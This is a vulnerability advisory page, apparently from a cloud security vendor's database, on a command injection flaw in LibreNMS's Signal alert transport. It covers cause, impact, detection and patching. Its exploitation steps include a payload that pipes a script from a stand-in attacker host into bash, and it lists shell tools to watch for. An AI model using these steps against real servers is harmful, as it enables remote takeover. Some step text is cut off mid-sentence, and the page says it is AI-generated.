
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-55182 is a command injection vulnerability in LibreNMS's Signal Alert Transport module that allows an authenticated administrator to execute arbitrary code on the host server. It affects LibreNMS versions >= 21.6.0 and was patched in version 26.5.0, released May 18, 2026. The vulnerability was originally published on June 10, 2026, and added to the GitHub Advisory Database on August 18, 2026. It carries a CVSS v4.0 base score of 8.6 (High) (GitHub Advisory).
The root cause is improper neutralization of special elements in a command (CWE-77), specifically in two locations: the deliverAlert function in LibreNMS/Alert/Transport/Signal.php and the scripts/composer_wrapper.php script. The Signal.php file makes an unsafe exec call where the signal-cli path and the Recipient field lack sufficient escaping, allowing semicolons and other shell metacharacters to be injected. An attacker can chain these two unsafe exec calls by setting the Path field to ../scripts/composer_wrapper.php (a path traversal) and injecting shell commands into the Recipient field prefixed and suffixed with ;, enabling execution of any binary on the server's filesystem (GitHub Advisory, LibreNMS Advisory).
Successful exploitation grants the attacker remote code execution (RCE) as the web application's service account, enabling complete system compromise, unauthorized access to sensitive monitoring data (network topology, credentials, SNMP community strings), data exfiltration, and potential lateral movement within the monitored network infrastructure. Confidentiality, integrity, and availability of the vulnerable LibreNMS host are all fully impacted (GitHub Advisory).
A detailed proof-of-concept (PoC) is publicly documented in the GitHub Security Advisory, describing the exact steps to reproduce the exploit via the LibreNMS web interface. However, exploitation requires authenticated administrator-level access, which limits the attack surface. As of the advisory publication date, there is no evidence of in-the-wild exploitation or threat actor attribution, and the CVE is not listed in the CISA KEV catalog (GitHub Advisory, Feedly).
Signal as the Transport type.Path field, enter ../scripts/composer_wrapper.php to redirect execution to the vulnerable wrapper script via path traversal.Recipient field, enter the desired command surrounded by semicolons, e.g., ;id; or ;curl http://attacker.com/shell.sh | bash;.Save Transport. Once saved, click the Test Transport button under the Action column for the newly created entry.Signal type, particularly with a Path value containing ../scripts/composer_wrapper.php; web server access logs showing POST requests to Alert Transport save/test endpoints from unexpected sources.bash, sh, curl, wget, python, nc) with unusual arguments or network connections./tmp, such as web shells, downloaded scripts, or SSH authorized_keys modifications created by the web server user.Upgrade LibreNMS to version 26.5.0 or later, which includes fixes for argument escaping in scripts/composer_wrapper.php and restricts executable path configuration in LibreNMS/Alert/Transport/Signal.php (LibreNMS Release). As a workaround prior to patching, restrict administrative access to the Alert Transports configuration to only fully trusted users, and consider disabling the Signal transport type if it is not in use. The remediation advice also recommends avoiding direct user-controlled executable paths in the web interface and instead using CLI-only configuration for such settings (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."